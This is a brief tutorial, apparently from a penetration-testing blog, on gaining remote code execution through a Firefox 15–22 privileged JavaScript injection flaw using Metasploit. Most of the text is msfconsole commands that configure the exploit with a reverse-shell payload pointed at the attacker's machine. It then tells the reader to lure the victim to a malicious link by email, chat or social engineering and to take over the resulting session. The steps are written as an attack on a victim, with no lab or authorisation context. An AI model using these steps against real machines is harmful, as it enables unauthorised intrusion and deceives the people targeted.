Kali Linux, Penetration Testing

Exploit Remote Windows, Linux, MAC PC using Firefox to String console.time Privileged JavaScript Injection

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges.

Exploit Targets

Firefox Version 15-22

Windows 7





Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_tostring_console_injection

msf exploit (firefox_tostring_console_injection)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_tostring_console_injection)>set lhost (IP of Local Host)

msf exploit (firefox_tostring_console_injection)>set srvhost

msf exploit (firefox_tostring_console_injection)>set uripath /

msf exploit (firefox_tostring_console_injection)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID